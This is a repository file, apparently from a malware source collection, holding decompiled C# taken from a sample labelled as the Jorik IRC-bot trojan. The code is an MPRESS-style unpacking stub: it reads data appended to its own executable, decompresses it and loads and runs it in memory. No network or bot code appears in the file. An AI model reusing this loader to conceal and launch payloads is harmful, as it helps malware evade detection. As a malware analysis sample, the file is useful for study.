MalwareSourceCode/MSIL/Trojan/Win32/J/Trojan.Win32.Jorik.IRCbot.hhe-79d154a70ce2e7f6c10e5e14d8e4f10e0c920324808f1aaf19d2845df60dcfb1/_.cs

240 lines
7.6 KiB
C#
Raw Normal View History

2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: insomn._
// Assembly: insomnia, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C5640D5E-8EFA-46F3-A304-3D9550F26F27
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan.Win32.Jorik.IRCbot.hhe-79d154a70ce2e7f6c10e5e14d8e4f10e0c920324808f1aaf19d2845df60dcfb1.exe
using System;
using System.IO;
using System.Reflection;
using System.Windows.Forms;
namespace insomn
{
internal class _
{
private static Assembly mp;
private static unsafe int lzmat(byte[] pOs, byte[] pIs, int cI)
{
int index1;
fixed (byte* numPtr1 = pOs)
fixed (byte* numPtr2 = pIs)
{
numPtr1[0] = numPtr2[4];
int index2 = 5;
index1 = 1;
byte num1 = 0;
while (index2 < cI - (int) num1)
{
byte num2 = numPtr2[index2++];
if (num1 != (byte) 0)
num2 = (byte) ((uint) (byte) ((uint) num2 >> 4) + (uint) (byte) ((uint) numPtr2[index2] << 4));
int num3 = 0;
while (num3 < 8 && index2 < cI - (int) num1)
{
if (((int) num2 & 128) == 128)
{
int num4 = *(int*) (numPtr2 + index2);
if (num1 != (byte) 0)
num4 >>= 4;
++index2;
int num5 = num4 & 1048575;
int num6;
if (index1 < 2177)
{
int num7 = num5 >> 1;
if ((num5 & 1) == 1)
{
index2 += (int) num1;
num6 = (num7 & 2047) + 129;
num1 ^= (byte) 1;
}
else
num6 = (num7 & (int) sbyte.MaxValue) + 1;
}
else
{
num6 = num5 >> 2;
switch (num5 & 3)
{
case 0:
num6 = (num6 & 63) + 1;
break;
case 1:
index2 += (int) num1;
num6 = (num6 & 1023) + 65;
num1 ^= (byte) 1;
break;
case 2:
num6 = (num6 & 16383) + 1089;
++index2;
break;
case 3:
index2 += 1 + (int) num1;
num6 = (num6 & 262143) + 17473;
num1 ^= (byte) 1;
break;
}
}
int num8 = (int) *(ushort*) (numPtr2 + index2);
int num9;
if (num1 != (byte) 0)
{
num9 = num8 >> 4;
num1 = (byte) 0;
++index2;
}
else
{
num9 = num8 & 4095;
num1 = (byte) 1;
}
int num10;
if ((num9 & 15) != 15)
{
num10 = (num9 & 15) + 3;
}
else
{
++index2;
if (num9 != 4095)
{
num10 = (num9 >> 4) + 18;
}
else
{
int num11 = *(int*) (numPtr2 + index2);
if (num1 != (byte) 0)
num11 >>= 4;
int num12 = num11 & (int) ushort.MaxValue;
index2 += 2;
if (num12 == (int) ushort.MaxValue)
{
int num13;
if (num1 != (byte) 0)
{
num13 = (*(int*) (numPtr2 + index2 - 4) & 252) << 5;
++index2;
num1 = (byte) 0;
}
else
num13 = (*(int*) (numPtr2 + index2 - 5) & 4032) << 1;
int num14 = num13 + (((int) num2 & (int) sbyte.MaxValue) + 4) << 1;
while (num14-- != 0)
{
*(int*) (numPtr1 + index1) = *(int*) (numPtr2 + index2);
index2 += 4;
index1 += 4;
}
break;
}
num10 = num12 + 273;
}
}
int num15 = index1 - num6;
while (num10-- != 0)
numPtr1[index1++] = numPtr1[num15++];
}
else
{
numPtr1[index1] = numPtr2[index2];
if (num1 != (byte) 0)
{
numPtr1[index1] = (byte) ((uint) numPtr1[index1] >> 4);
byte* numPtr3 = numPtr1 + index1;
*numPtr3 = (byte) ((uint) *numPtr3 + (uint) (byte) ((uint) numPtr2[index2 + 1] << 4));
}
++index1;
++index2;
}
++num3;
num2 <<= 1;
}
}
}
return index1;
}
private static bool lz(byte[] c, out byte[] a, int l)
{
a = (byte[]) null;
if (c[4] != (byte) 77 || c[6] != (byte) 90)
return false;
byte[] pOs = new byte[8 + (int) c[0] + ((int) c[1] << 8) + ((int) c[2] << 16) + ((int) c[3] << 24)];
if (_.lzmat(pOs, c, l) == 0)
return false;
a = pOs;
return true;
}
private static bool lf(string fn, out byte[] a)
{
FileStream input = new FileStream(fn, FileMode.Open, FileAccess.Read, FileShare.Read);
int length1 = (int) input.Length;
input.Seek(60L, SeekOrigin.Begin);
BinaryReader binaryReader = new BinaryReader((Stream) input);
int offset1 = binaryReader.ReadInt32();
if (offset1 >= 2 && offset1 <= length1 - 512)
{
input.Seek((long) offset1, SeekOrigin.Begin);
if (binaryReader.ReadUInt32() == 17744U)
{
ushort num1 = binaryReader.ReadUInt16();
int offset2 = num1 != (ushort) 34404 ? offset1 + 348 : offset1 + 324;
input.Seek((long) offset2, SeekOrigin.Begin);
int num2 = binaryReader.ReadInt32();
int offset3;
if (num1 == (ushort) 34404)
{
int offset4 = offset2 - 12;
input.Seek((long) offset4, SeekOrigin.Begin);
offset3 = num2 + binaryReader.ReadInt32();
}
else
offset3 = num2 + 16;
if (offset3 < length1 && offset3 >= 768)
{
int length2 = length1 - offset3;
byte[] numArray = new byte[length2];
input.Seek((long) offset3, SeekOrigin.Begin);
input.Read(numArray, 0, length2);
input.Close();
if (_.lz(numArray, out a, length2))
return true;
}
}
}
a = (byte[]) null;
return false;
}
[STAThread]
private static int Main(string[] args)
{
byte[] a;
if (!_.lf(Application.ExecutablePath, out a))
{
int num = (int) MessageBox.Show("File is invalid.", "MPRESS");
return -1;
}
int num1;
try
{
_.mp = Assembly.Load(a);
MethodInfo entryPoint = _.mp.EntryPoint;
object[] parameters = (object[]) null;
if (entryPoint.GetParameters().Length > 0)
parameters = new object[1]{ (object) args };
object obj = entryPoint.Invoke((object) null, parameters);
num1 = obj == null ? 0 : (int) obj;
}
catch
{
num1 = -1;
}
return num1;
}
}
}